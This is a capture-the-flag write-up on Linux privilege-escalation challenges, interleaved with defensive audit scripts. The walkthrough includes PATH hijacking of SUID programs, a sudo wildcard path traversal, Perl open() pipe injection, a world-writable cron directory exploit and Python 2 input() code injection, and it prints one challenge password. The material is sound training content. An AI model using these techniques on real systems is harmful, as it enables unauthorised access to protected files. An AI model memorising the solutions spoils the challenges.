Bash - System 1

What are SUID privileged programs

  • The concept of effective uid and real uid.
  • For non-Set-UID programs, the effective uid and the real uid are the same.
  • For Set-UID programs, the effective uid is the owner of the program, while the real uid is the user of the program.

Normally, UNIX scripts and programs run with the same permissions as the user who executes them.

SUID programs, however, override normal permissions and always run with the permissions of the program’s owner.

The /usr/bin/passwd command is SUID and is owned by root. It always runs with the same permissions as root.

$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root 63944 Jul 16  2019 /usr/bin/passwd

How to turn on the Set-UID bit

$ chmod 4777 file -> -rwsrwxrwx

What do the ‘s’ and ‘t’ in file permissions mean

Looking closely at the two previous examples, you will notice an s: it marks the file as a SUID or SGID privileged program. If the letter is a capital S, the set-id bit is set but not in effect (the corresponding execute bit is missing). The 4 in the chmod example above is the numeric form of the s permission, and it sits in the special (leading) digit.

The t appears in a later challenge. It is normally applied to directories with 777 permissions: when the t (sticky) bit is set, only a file's owner and root may delete the file. Linux's /tmp directory for temporary files has the t bit set.

Turn the bit on
$ chmod 1777 file -> drwxrwxrwt

Turn the bit off
$ chmod 0777 file -> drwxrwxrwx
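To make the s/S and t/T distinction concrete, here is an added example (not from the original notes) that decodes a mode string as printed by ls -l, reports which special bits are set and whether they are effective, and derives the leading octal digit chmod would need. The mode strings it is run on are constructed; the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original notes: decode the special bits in a
# mode string as printed by `ls -l`, so the difference between s/S and t/T is
# explicit. Mode strings used below are constructed, not taken from a system.

# describe_mode MODE -> prints one line per special bit: setuid, setgid, sticky,
# each followed by "effective" or "not effective" (capital S/T: the matching
# execute bit is missing, so the bit is set but has no effect).
describe_mode() {
    _m=$1
    _found=0
    case $_m in
        ???s??????) echo "setuid: effective";     _found=1 ;;
        ???S??????) echo "setuid: not effective"; _found=1 ;;
    esac
    case $_m in
        ??????s???) echo "setgid: effective";     _found=1 ;;
        ??????S???) echo "setgid: not effective"; _found=1 ;;
    esac
    case $_m in
        ?????????t) echo "sticky: effective";     _found=1 ;;
        ?????????T) echo "sticky: not effective"; _found=1 ;;
    esac
    [ "$_found" -eq 1 ] || echo "no special bits"
}

# special_octal MODE -> the leading octal digit chmod needs for these bits
# (4 = setuid, 2 = setgid, 1 = sticky, summed), e.g. 4 for -rwsr-xr-x.
special_octal() {
    _m=$1
    _n=0
    case $_m in ???[sS]??????) _n=$((_n + 4)) ;; esac
    case $_m in ??????[sS]???) _n=$((_n + 2)) ;; esac
    case $_m in ?????????[tT]) _n=$((_n + 1)) ;; esac
    echo "$_n"
}

describe_mode "-rwsr-xr-x"   # /usr/bin/passwd from the notes above
describe_mode "drwxrwxrwt"   # a sticky 1777 directory such as /tmp
special_octal "-rwsr-xr-x"   # 4
```

The functions only look at the ten-character mode string, so they work equally on a line captured from ls -l and on a value typed in by hand.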

What are PATH Environment Variables

When running a command in a shell, the shell searches for the command using the PATH environment variable, which consists of a list of directories.

The shell program searches through this list of directories in the same order as they are specified in the PATH environment variable.

The first program that matches with the name of the command will be executed.

What would happen in the following? Note that the system(const char *cmd) library function first invokes the /bin/sh program, and then lets the shell execute cmd.

system ("mail");

The attacker can change PATH to the following, and cause “mail” in the current directory to be executed.

export PATH=.:$PATH

.:$PATH prepends the current directory to the existing PATH value; export then sets the result in the environment.
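As an added example (not part of the original notes), the following shell functions audit a PATH value for the entries that make this attack possible and reproduce the shell's first-match lookup, so the effect of an entry like "." on a bare command name can be verified from the defender's side. The PATH values are constructed and the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original notes: audit a PATH value for entries
# that let whoever controls the working directory or the environment decide
# which binary a bare command name resolves to, and show the first-match rule
# the shell applies. The PATH values used below are constructed.

# audit_path PATH -> prints one line per insecure entry; returns 0 if none.
# Flagged: empty entries (an empty field means the current directory), ".",
# and any other relative entry.
audit_path() {
    _rest="$1:"          # trailing ':' so the last field is visited too
    _bad=0
    while [ -n "$_rest" ]; do
        _entry=${_rest%%:*}
        _rest=${_rest#*:}
        case $_entry in
            "") echo "insecure: empty entry (means current directory)"; _bad=1 ;;
            .)  echo "insecure: '.' (current directory)";               _bad=1 ;;
            /*) ;;                                    # absolute: acceptable
            *)  echo "insecure: relative entry '$_entry'";           _bad=1 ;;
        esac
    done
    return "$_bad"
}

# resolve_command NAME PATH -> prints the file the shell would execute for NAME,
# i.e. the first executable regular file found in PATH order; returns 1 if none.
resolve_command() {
    _name=$1
    _rest="$2:"
    while [ -n "$_rest" ]; do
        _dir=${_rest%%:*}
        _rest=${_rest#*:}
        _cand="${_dir:-.}/$_name"          # empty field behaves like "."
        if [ -f "$_cand" ] && [ -x "$_cand" ]; then
            printf '%s\n' "$_cand"
            return 0
        fi
    done
    return 1
}

audit_path "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" && echo "clean PATH"
audit_path ".:/usr/bin:/bin" || echo "the PATH above would fail a hardening check"
resolve_command sh "/usr/bin:/bin"       # where a bare "sh" comes from with a clean PATH
```

The check is useful in two places: on the PATH a privileged program inherits (the sudoers secure_path shown later on this page exists for exactly this reason) and on the PATH a cron job or SUID wrapper sets for itself before calling system().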

Start the game

Check the current path

app-script-ch11@challenge02:~$ pwd
/challenge/app-script/ch11

List the current directory

app-script-ch11@challenge02:~$ ll
total 28
dr-xr-x---  2 app-script-ch11-cracked app-script-ch11 4096 May 19  2019 ./
drwxr-xr-x 17 root                    root            4096 Mar 19 20:19 ../
-r--------  1 app-script-ch11-cracked app-script-ch11   14 Feb  8  2012 .passwd
-r--r-----  1 app-script-ch11-cracked app-script-ch11  494 May 19  2019 Makefile
-r-sr-x---  1 app-script-ch11-cracked app-script-ch11 7252 May 19  2019 ch11*
-r--r-----  1 app-script-ch11-cracked app-script-ch11  187 May 19  2019 ch11.c

ch11 is the SUID privileged binary, and .passwd is the sensitive file.

View the ch11 source

app-script-ch11@challenge02:~$ cat ch11.c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    setreuid(geteuid(), geteuid());
    system("ls /challenge/app-script/ch11/.passwd");
    return 0;
}

system("ls /challenge/app-script/ch11/.passwd"); runs with ch11's privileges, but ls only lists the file; reading it would need cat. Because ls is looked up through PATH, a copy of cat renamed to ls is what ends up being executed, which achieves the bypass.

Check the PATH environment variable

app-script-ch11@challenge02:/usr/local/bin$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/opt/tools/checksec/

Locate the cat and ls commands

app-script-ch11@challenge02:~$ ll /bin | grep -w "ls"
-rwxr-xr-x  1 root root  145144 Jan 18  2018 ls*
app-script-ch11@challenge02:~$ ll /bin | grep -w "cat"
-rwxr-xr-x  1 root root   38420 Jan 18  2018 cat*

Both live in the /bin directory.

Copy cat to /tmp

app-script-ch11@challenge02:/tmp$ cp /bin/cat .

/tmp has the permissions below at this point, with no read permission for others; creating a subdirectory inside /tmp and working there is clearer.

drwxrwx-wt  42 root root 2166784 May 12 17:36 tmp/

Rename cat to ls

app-script-ch11@challenge02:/tmp$ mv cat ls

Modify the environment variable

app-script-ch11@challenge02:/tmp$ export PATH=.:$PATH

Use ch11 to read .passwd

app-script-ch11@challenge02:/tmp$ ~/ch11

Reference

Dangers of SUID Shell Scripts

SUID Privileged Programs

sudo - weak configuration

What is sudo

  • Allows delegation of specific root privileges
  • Allows users to run specific commands as a different user

Run a Command as Another User

  • Use the -u flag
    $ sudo -u <username>
  • Enter your password, not the root password

Sudo Policy Format

The complex stuff is in /etc/sudoers

User Host=(RunAs) Command
  • User = who can do this
  • Host = which host this applies to
  • RunAs = target user (optional)
  • Command = the privileged command

Default Sudo Policy

%wheel ALL = ALL

If you’re in the wheel group, you get total access.

Testing sudoers

What access do I have

$ sudo -l

What access do other users have

$ sudo -U <username> -l

How to add a user into Sudo

usermod -a -G wheel/sudo <username>

If /etc/sudoers has no sudo group, add your user to the wheel group instead; under the default policy above, wheel has the same sudo rights.

Start the game

View the readme

app-script-ch1@challenge02:~$ cat readme.md
Vous devez réussir à lire le fichier .passwd situé dans le chemin suivant :
/challenge/app-script/ch1/ch1cracked/

You have to read the .passwd located in the following PATH :
/challenge/app-script/ch1/ch1cracked/

The current user, app-script-ch1, has no read permission on the ch1cracked directory.

Check the current directory

app-script-ch1@challenge02:~$ pwd
/challenge/app-script/ch1

Check the current user's sudo rights

app-script-ch1@challenge02:~/ch1cracked$ sudo -l
[sudo] password for app-script-ch1:
Matching Defaults entries for app-script-ch1 on challenge02:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch1 may run the following commands on challenge02:
    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/notes/*

The * matches any sequence of characters.

Read the file as user app-script-ch1-cracked

app-script-ch1@challenge02:~/ch1cracked$ sudo -u app-script-ch1-cracked /bin/cat /challenge/app-script/ch1/notes/../ch1cracked/.passwd
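sudo matches the argument part of a rule against the requested command line as a single glob, so the * in the notes/* rule also matches ../ch1cracked/.passwd. The following added example (not from the writeup) normalises a path lexically and checks whether it still lies under the notes directory, which is the test a rule author would have to apply before trusting a wildcard like this one. The paths are the challenge's; the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original writeup: sudoers matches command
# arguments as one glob, so the '*' in
#   (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/notes/*
# also accepts arguments containing "../". These helpers show what it takes to
# actually confine an argument to one directory. Intended for absolute paths.

# normalize_path PATH -> lexically resolves "." and ".." segments and collapses
# repeated slashes, without touching the filesystem (symlinks are not followed).
normalize_path() {
    _rest="$1/"
    _out=""
    while [ -n "$_rest" ]; do
        _seg=${_rest%%/*}
        _rest=${_rest#*/}
        case $_seg in
            ""|.) ;;                       # empty or current segment: skip
            ..)   _out=${_out%/*} ;;       # parent: drop the last segment
            *)    _out="$_out/$_seg" ;;
        esac
    done
    printf '%s\n' "${_out:-/}"
}

# path_within DIR PATH -> 0 if PATH, after normalization, lies strictly inside DIR.
path_within() {
    _dir=$(normalize_path "$1")
    _p=$(normalize_path "$2")
    [ "$_dir" = / ] && _dir=""             # so that DIR=/ matches "/anything"
    case $_p in
        "$_dir"/*) return 0 ;;
        *)         return 1 ;;
    esac
}

# check_notes_rule ARG -> the review a sudoers author should do: does an
# argument the glob accepts really stay under the notes directory?
check_notes_rule() {
    if path_within /challenge/app-script/ch1/notes "$1"; then
        echo "confined: $1"
    else
        echo "ESCAPES notes/: $1 -> $(normalize_path "$1")"
    fi
}

check_notes_rule /challenge/app-script/ch1/notes/todo.txt
check_notes_rule /challenge/app-script/ch1/notes/../ch1cracked/.passwd
```

Note that this normalisation is purely lexical: a symbolic link inside notes/ pointing elsewhere would still pass, which is why a rule that only needs to expose a handful of files is better written as an explicit list than as a wildcard.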

Reference

sudo you are doing it wrong

Bash - System 2

Start the game

View the ch12 source

app-script-ch12@challenge02:~$ cat ch12.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
    setreuid(geteuid(), geteuid());
    system("ls -lA /challenge/app-script/ch12/.passwd");
    return 0;
}

Create /tmp/hacker

app-script-ch12@challenge02:~$ cd /tmp/
app-script-ch12@challenge02:/tmp$ mkdir hacker

Write ls.c and compile it to ls

#include <stdlib.h>
#include <stdio.h>

int main(){
        system("cat /challenge/app-script/ch12/.passwd");
        return 0;
}

The argument to system() is a string and must be wrapped in double quotes.

app-script-ch12@challenge02:/tmp/hacker$ gcc -o ls ls.c

Modify the environment variable and run ch12

app-script-ch12@challenge02:/tmp/hacker$ export PATH=.:$PATH
app-script-ch12@challenge02:/tmp/hacker$ ~/ch12

Reference

(Null)

Perl - Command injection

Security issues with open()

The open() function in Perl is used to open files. In its most common form, it is used in the following way:

open (FILEHANDLE, "filename");

If the filename begins with “|”, the filename is interpreted as a command to which output is to be piped.

open (FILEHANDLE, "| filename");

Start the game

app-script-ch7@challenge02:~$ ./setuid-wrapper
*************************
* Stat File Service    *
*************************
>>> | cat .passwd
PerlCanDoBetterThanYouThink
~~~ Statistics for "| cat .passwd" ~~~
Lines: 0
Words: 0
Chars: 0

Reference

Security Issues in Perl Scripts

Bash - cron

Linux has two kinds of links

  • Hard links
  • Symbolic links (soft links)

A symbolic link is similar to a Windows shortcut.

# cron.d is a symbolic link pointing to /tmp/._cron/
cron.d -> /tmp/._cron/ 

How do ${0##*/} and ${0%/*} work?

  • ${0##*/}

    for the variable $0 and the pattern /, the two # mean: starting from the beginning of the parameter, delete the longest match, including the pattern

  • ${0%/*}

    the pattern / is matched against the end of the parameter (%), and the shortest match is deleted

$0 = $HOME/documents/doc.txt
${0##*/} -> doc.txt
${0%/*} -> $HOME/documents

What is the meaning of $0?

$0 is the name of the shell script being executed.

What do -f, -a and -x mean in a bash if statement

  • -f

    true if file exists and is a regular file

  • -a

    &&

  • -x

    true if file is executable
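The following added example (not part of the original notes) wraps the two expansions and the file tests used by ch4 in functions so their behaviour can be checked, including the case the notes do not show: a name with no '/' in it, where ${0%/*} returns the whole input rather than a directory. It writes the -f/-x combination with && rather than -a, which POSIX marks as obsolescent. The function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original notes: the two expansions used by ch4,
# wrapped so their behaviour (including inputs with no '/') is explicit, plus the
# test-operator combination from its if statement written with '&&'.

# name_of PATH -> everything after the last '/' (what ${0##*/} yields)
name_of() {
    printf '%s\n' "${1##*/}"
}

# dir_of PATH -> everything before the last '/' (what ${0%/*} yields).
# Edge cases: with no '/' at all, ${0%/*} returns the input unchanged, which is
# not a directory, so return "." as dirname(1) does; for "/name" the expansion
# yields an empty string, so return "/".
dir_of() {
    case $1 in
        */*) _d=${1%/*}; printf '%s\n' "${_d:-/}" ;;
        *)   printf '.\n' ;;
    esac
}

# is_runnable_file PATH -> 0 when PATH is a regular file (-f) and executable (-x);
# the same condition as ch4's `[ -f ... -a -x ... ]`.
is_runnable_file() {
    [ -f "$1" ] && [ -x "$1" ]
}

name_of "$HOME/documents/doc.txt"   # doc.txt
dir_of  "$HOME/documents/doc.txt"   # $HOME/documents
dir_of  "doc.txt"                   # .
name_of "/challenge/app-script/ch4/ch4"   # ch4: how ch4 finds its own directory via ${0%/*}
```

In ch4 the expansion is applied to $0, so the script only changes into the right directory when it is invoked by an absolute or relative path that contains a '/'; when it is started via PATH lookup as a bare name, ${0%/*} is the bare name itself and cd fails (which exec 1>/dev/null 2>&1 then hides).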

Start the game

List the current directory

app-script-ch4@challenge02:~$ ll
total 16
dr-xr-x---  2 app-script-ch4-cracked app-script-ch4         4096 Jul  1  2017 ./
drwxr-xr-x 17 root                   root                   4096 Mar 19 20:19 ../
-r-xr-x---  1 app-script-ch4-cracked app-script-ch4          767 Jul  2  2017 ch4*
lrwxrwxrwx  1 app-script-ch4         app-script-ch4           11 May 25  2015 cron.d -> /tmp/._cron/
-r--r-----  1 app-script-ch4-cracked app-script-ch4-cracked   16 Jun  1  2013 .passwd

View the ch4 script

#!/bin/bash

# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)

# hiding stdout/stderr
exec 1>/dev/null 2>&1

wdir="cron.d/"
challdir=${0%/*}
cd "$challdir"


if [ ! -e "/tmp/._cron" ]; then
    mkdir -m 733 "/tmp/._cron"
fi

ls -1a "${wdir}" | while read task; do
    if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
        timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
    fi
    rm -f "${PWD}/${wdir}${task}"
done

rm -rf cron.d/*

Audit the ch4 script

The cron job runs ch4 every minute; ch4 executes every executable file under cron.d/ and then deletes everything in cron.d/.
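The weakness being audited is that a privileged cron job executes whatever appears in a directory it created with mode 733, i.e. writable by everyone. As an added example (not the challenge's code), here is the check a job of this shape should perform before running a task file: refuse a directory that others can write to, and refuse a task that is not a regular executable owned by the user the job runs as. The demonstration builds its own directories under mktemp and never touches /tmp/._cron; the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the challenge's code: ch4 runs, as the privileged
# user, every executable dropped into a directory created with mode 733. A cron
# job that must execute files from a directory should refuse when the directory
# is writable by others or the task is not owned by the user the job runs as.

# world_writable PATH -> 0 if "others" have write permission on PATH
world_writable() {
    _mode=$(ls -ld "$1" | cut -c1-10)      # e.g. drwxrwx-wt for /tmp in the notes
    case $_mode in
        ????????w?) return 0 ;;
        *)          return 1 ;;
    esac
}

# owner_of PATH -> the owning user name, as ls -l prints it (third column)
owner_of() {
    ls -ld "$1" | awk '{ print $3 }'
}

# task_is_trusted TASKDIR TASK EXPECTED_OWNER -> 0 only if the directory is not
# world-writable, the task is a regular executable file and it is owned by
# EXPECTED_OWNER. Prints the reason for rejection otherwise.
task_is_trusted() {
    _dir=$1 _task=$2 _owner=$3
    if world_writable "$_dir"; then
        echo "reject: $_dir is world-writable"; return 1
    fi
    if ! [ -f "$_dir/$_task" ] || ! [ -x "$_dir/$_task" ]; then
        echo "reject: $_dir/$_task is not a regular executable file"; return 1
    fi
    if [ "$(owner_of "$_dir/$_task")" != "$_owner" ]; then
        echo "reject: $_dir/$_task is not owned by $_owner"; return 1
    fi
    return 0
}

# Demonstration with constructed directories, run as the current user.
demo_dir=$(mktemp -d)
mkdir -m 733 "$demo_dir/open"      # the mode ch4 uses for /tmp/._cron
mkdir -m 755 "$demo_dir/closed"
for d in open closed; do
    printf '#!/bin/sh\n' > "$demo_dir/$d/task" && chmod 755 "$demo_dir/$d/task"
done
task_is_trusted "$demo_dir/open"   task "$(id -un)" || true
task_is_trusted "$demo_dir/closed" task "$(id -un)" && echo "accept: $demo_dir/closed/task"
rm -rf "$demo_dir"
```

Even with these checks the safer design is the one ch4 does not use: keep the task directory under a path only the job's user can write, and never under /tmp, where the directory name itself can be claimed by another user before the job creates it.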

Write the solution script

app-script-ch4@challenge02:~$ vim cron.d/1.sh
#!/bin/bash
if [ ! -e "/tmp/ch4" ]; then
    mkdir -m 777 "/tmp/ch4"
fi
/bin/cat /challenge/app-script/ch4/.passwd > /tmp/ch4/result.txt

Set the script permissions

app-script-ch4@challenge02:~$ crontab -l
You (app-script-ch4) are not allowed to use this program (crontab)
See crontab(1) for more information

Output of the command ‘crontab -l’ run as app-script-ch4-cracked

Combining the output above with the hint in the challenge, the user that runs the cron job is app-script-ch4-cracked.

app-script-ch4@challenge02:~$ chmod 777 cron.d/1.sh

Read the .passwd file

app-script-ch4@challenge02:~$ cat /tmp/ch4/result.txt

Reference

(Null)

Python - input()

Start the game

View the ch6 source

app-script-ch6@challenge02:~$ cat ch6.py
#!/usr/bin/python2

import sys

def youLose():
    print "Try again ;-)"
    sys.exit(1)


try:
    p = input("Please enter password : ")
except:
    youLose()


with open(".passwd") as f:
    passwd = f.readline().strip()
    try:
        if (p == int(passwd)):
            print "Well done ! You can validate with this password !"
    except:
        youLose()

Exploit the command-execution flaw in input()

app-script-ch6@challenge02:~$ ./setuid-wrapper
Please enter password : __import__('os').system('cat .passwd')

Reference

The input() vulnerability in Python and how it differs from raw_input()